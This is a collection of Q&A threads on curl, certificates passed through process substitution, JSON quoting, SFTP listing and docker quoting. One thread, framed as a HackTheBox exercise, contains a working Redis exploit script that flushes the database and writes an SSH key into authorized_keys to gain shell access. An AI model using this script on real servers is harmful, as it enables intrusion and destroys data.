File path pointing to variable in bash script

I wonder whether it is possible to provide the file content itself instead of a file path. For example, curl needs to be given a file path to a certificate. What can I do when I have the certificate in a variable?
I can't put it on stdin, because I'm generating XML to send there.
Why do I put the certificate into a variable? Because in the end I'd like to have just one script file, which I can easily distribute to my colleagues.
The only solution that comes to my mind is to save the variable to a file and then provide that file path to curl:
read -d '' CERT << "CERTEND"
-----BEGIN CERTIFICATE-----
### something very secret here ###
-----END CERTIFICATE-----
CERTEND
curl -# -k --cert ??? -d @xml.xml -H "Content-Type: application/soap+xml" -H 'SOAPAction: ""' https://1.1.1.1/EndpointPort

You can use process substitution:
curl --cert <(echo "$CERT") ...
which creates a pipe for you. The output of the command in parentheses (echo "$CERT" in our case) goes into the pipe, and the filename of the pipe (such as /dev/fd/63) is substituted on the command line.
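Putting the pieces together, a minimal runnable sketch looks like the following. The certificate body is a placeholder, and cat stands in for curl at the end so the sketch runs without a network; with curl the same path would be passed to --cert.

```shell
#!/usr/bin/env bash
# Read the embedded certificate into a variable; -r keeps backslashes intact.
read -r -d '' CERT << "CERTEND"
-----BEGIN CERTIFICATE-----
### something very secret here ###
-----END CERTIFICATE-----
CERTEND

# <(...) expands to a /dev/fd/N path that the command can open like a file,
# so the curl invocation from the question would become:
#   curl -# -k --cert <(printf '%s\n' "$CERT") -d @xml.xml ... https://1.1.1.1/EndpointPort
# cat stands in for curl here, purely to show the pipe is readable:
cat <(printf '%s\n' "$CERT")
```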

Related

Passing key and pem file data in curl command not working

I am trying to invoke an API using the curl command, but unfortunately I won't be able to keep the files on disk. I am trying to pass the .key and .pem files' data in the command, but I am not able to pass it correctly. Below is my command in my .sh file:
response=$(curl --key "$5" --cert "$6" -k -X "$2" -d "$payload" "$4")
I am calling the script this way:
key="${key}"
pem="${pem}"
bash ./Integration1.sh Provision POST "$payload" https://some-api.com/pr "$key" "$pem"
It gives the below error:
curl: (58) could not load PEM client certificate from -----BEGIN CERTIFICATE-----
This command works fine if I pass the files directly, so is there any way to pass the data via string variables in the curl command?
If you only have your key data in a variable and can't write it to a file yourself for some reason, an alternative solution is to use process substitution.
bash ./Integration1.sh Provision POST "$payload" https://some-api.com/pr \
<(printf '%s' "$key") \
<(printf '%s' "$pem")
This requires bash and still uses files under the hood, but it doesn't require you to manage the files yourself or know where they're located.
--key and --cert take the name of a file containing certificate data, not the certificate data itself.
... "$(cat my_client.key)" "$(cat my_client.pem)"
Should just be
... my_client.key my_client.pem
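To see that a process-substitution path behaves like any other positional argument inside the called script, here is a tiny self-contained sketch (the inner function stands in for a script like Integration1.sh, and the key value is a placeholder):

```shell
#!/usr/bin/env bash
# inner() plays the role of the called script: it only needs a readable
# path in $1, so it cannot tell a /dev/fd pipe from a regular file.
inner() { head -n 1 "$1"; }

key='-----BEGIN PRIVATE KEY-----'
# The <(...) path reaches the function as an ordinary first argument.
inner <(printf '%s\n' "$key")
```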

CURL request fails with error msg "failed to decrypt request"

I have implemented a curl script to execute an API call which requires an encrypted string as data, but it fails with 'failed to decrypt request'. I have tried Python as well (the requests and Crypto modules) but failed with the same error message.
#!/usr/bin/env bash
output=$(openssl enc -aes-256-cbc -pass pass:xxxxxxx -in msg.txt -base64)
curl -X POST \
"https://api.swing.tradesmartonline.in/api/v1/login-token" \
-H "Content-Type: application/json" \
-d '{"data":"$output","app":"APPLICATION_ID"}'
Output is: {"status":"false","data":"","error_msg":"failed to decrypt request."}
Whereas I am able to decrypt the message locally using the below command:
echo "$output" | openssl enc -aes-256-cbc -base64 -pass pass:xxxxxxx -d
Thanks in advance
The shell will not expand your variables in a single quoted string. Either:
Use double quotes and escape embedded double quotes with \":
"{\"data\":\"$output\",\"app\":\"APPLICATION_ID\"}"
Use single quotes for the static text and double quotes for the parts that contain variables (this means less escaping):
'{"data":"'"$output"'","app":"APPLICATION_ID"}'
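The difference between the three quoting styles can be seen directly; the value of $output below is a stand-in, not real ciphertext:

```shell
#!/usr/bin/env bash
# Placeholder value standing in for the openssl output from the question.
output='U2FsdGVkX1'

single='{"data":"$output"}'       # single quotes: $output stays literal
double="{\"data\":\"$output\"}"   # double quotes: $output expands, but every " needs \
mixed='{"data":"'"$output"'"}'    # quote switching: expands, with less escaping

printf '%s\n' "$single" "$double" "$mixed"
```

The first line printed still contains the literal text $output, which is exactly why the API in the question received an undecryptable payload; the second and third lines are identical, valid JSON.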

curl to SFTP and list files in directory

I am using the below curl command in my shell script to connect to a remote SFTP directory.
curl -k "sftp://url.test.com/test_folder" --user "username:password"
Is there a way to list the files in the directory test_folder?
Yes: end the URL with a trailing slash, to indicate to curl that it is in fact a directory! Like this:
curl -k sftp://url.test.com/test_folder/ --user "username:password"

Redis Public Keys

I am working on HackTheBox and have come across a question that Google has yet to answer. The current script looks like so:
#!/bin/bash
rm /root/.ssh/id*
ssh-keygen -t rsa
(echo -e "\n\n";cat "/root/.ssh/id_rsa.pub";echo -e "\n\n") > "/root/Desktop/postmanKey.txt"
redis-cli -h 10.10.10.160 flushall
cat "/root/Desktop/postmanKey.txt" | redis-cli -h 10.10.10.160 -x set bb
redis-cli -h 10.10.10.160 save
redis-cli -h 10.10.10.160 set dbfilename "authorized_keys"
redis-cli -h 10.10.10.160 save
ssh -i "/root/.ssh/id_rsa" redis@10.10.10.160
I understand all of it except for one thing. Why do we do (echo -e "\n\n";cat "/root/.ssh/id_rsa.pub";echo -e "\n\n") > "/root/Desktop/postmanKey.txt" to write the public key with two leading and two trailing newlines? I have done some tinkering and quite a few Google searches, but I have yet to turn up the reason why this is necessary. If I push the file to the server without the newlines and then attempt to connect via ssh, I am unable to. My only thought is that maybe this has something to do with the common format of private keys:
-----BEGIN RSA PRIVATE KEY-----
....
-----END RSA PRIVATE KEY-----
However, we are connecting with a private key but pushing a public key to the server... hence why I am lost. Thank you for any information!

How to pass "escape hell" to docker run

I'm trying to pass several commands to an alpine container from PowerShell/cmd. The problem is that the commands contain quotes, single quotes, and escaped quotes.
Sample command; the actual command is one line, I'm splitting it here so it is easier to read:
docker run neilpang/acme.sh bin/sh -c --%
"acme.sh --issue --dns dns_azure --dnssleep 10 --force -d "domain";
openssl pkcs12 -inkey /acme.sh/domain/domain.key -in /acme.sh/domain/domain.cer -export -out pfx -password pass:password;
curl -X POST -d "{\"certName\":\"certName1\",\"certData\":\"$(tail -n +2 /acme.sh/domain/domain.cer > b64; head -n -1 b64)\"}" url -H Content-Type:application/json;
curl -X POST -d "{\"certName\":\"certName2\",\"certData\":\"$(openssl base64 -in pfx -out b64; cat b64)\"}" url -H Content-Type:application/json"
What I've tried:
Using single quotes around the whole expression (after --%) returns something like "quoted string not closed".
Using single quotes around the JSON works fine, but $() doesn't get interpreted, so I don't get proper output.
Escaping " before/after the JSON.
Without " before/after the JSON, I get some garbage.
I never got it to work without --%, but it appears PowerShell does some string manipulation even when using --%.
I did some experiments with cmd; no luck either.
I'm open to any way of making this work :)
for those requesting errors, here's a sample:
-n: line 1: syntax error: unexpected end of file (expecting ")") # quotes around expression
-p: line 1: syntax error: unterminated quoted string # single quotes around expression
no error, but certData empty # no quotes around json
no quotes in json >> not valid json >> doesnt get parsed # escaped quotes around json
Executing the strings I'm trying to pass inside the container results in the working "solution", whereas trying to pass them through docker run results in the different defects described above. I'm not sure where these arise: from PowerShell (although I firmly believe --% does its work here and PowerShell passes everything through properly), from Docker, or from bash itself. The closest I got to working is the ' version, but it doesn't evaluate the expression inside $(), so that's the problem.
You'll find the quoting issues significantly easier if you turn your very long, very involved command line into a shell script, package it into a custom image, and then run that.
Shell script, let's call it run_acme.sh:
#!/bin/sh
acme.sh --issue --dns dns_azure --dnssleep 10 --force -d "domain"
openssl pkcs12 \
-inkey /acme.sh/domain/domain.key \
-in /acme.sh/domain/domain.cer \
-export \
-out pfx \
-password pass:password
CER_B64=$(tail -n +2 /acme.sh/domain/domain.cer | head -n -1)
curl -X POST \
--data-binary "{\"certName\":\"certName1\",\"certData\":\"$CER_B64\"}" \
-H 'Content-Type: application/json' \
url
PFX_B64=$(openssl base64 -in pfx)
curl -X POST \
--data-binary "{\"certName\":\"certName2\",\"certData\":\"$PFX_B64\"}" \
-H 'Content-Type: application/json' \
url
Dockerfile:
FROM neilpang/acme.sh
COPY run_acme.sh /bin
CMD ["/bin/run_acme.sh"]
Then you can docker build this like any other custom image, and docker run it, and the very long command line will be baked into the shell script in your image.
I'd suggest using splatting to make this significantly cleaner to maintain. Note: I'm uncertain whether your shell script needs to escape the quotes around the -d parameter.
$curl1 = '"{\"certName\":\"certName1\",' +
'\"certData\":\"$(tail -n +2 /acme.sh/domain/domain.cer > b64; head -n -1 b64)\"}"'
$curl2 = '"{\"certName\":\"certName2\",' +
'\"certData\":\"$(openssl base64 -in pfx -out b64; cat b64)\"}"'
$dockerArgs = @(
'run', 'neilpang/acme.sh', 'bin/sh', '-c'
'"acme.sh --issue --dns dns_azure --dnssleep 10 --force -d "domain";' +
'openssl pkcs12 -inkey /acme.sh/domain/domain.key -in /acme.sh/domain/domain.cer ' +
'-export -out pfx -password pass:password;' +
"curl -X POST -d $curl1 url -H Content-Type:application/json;" +
"curl -X POST -d $curl2 url -H Content-Type:application/json"""
)
docker.exe @dockerArgs
The PowerShell escape character is a grave accent (`), or you can double up on the quotes ("") to escape double quotes: "`"".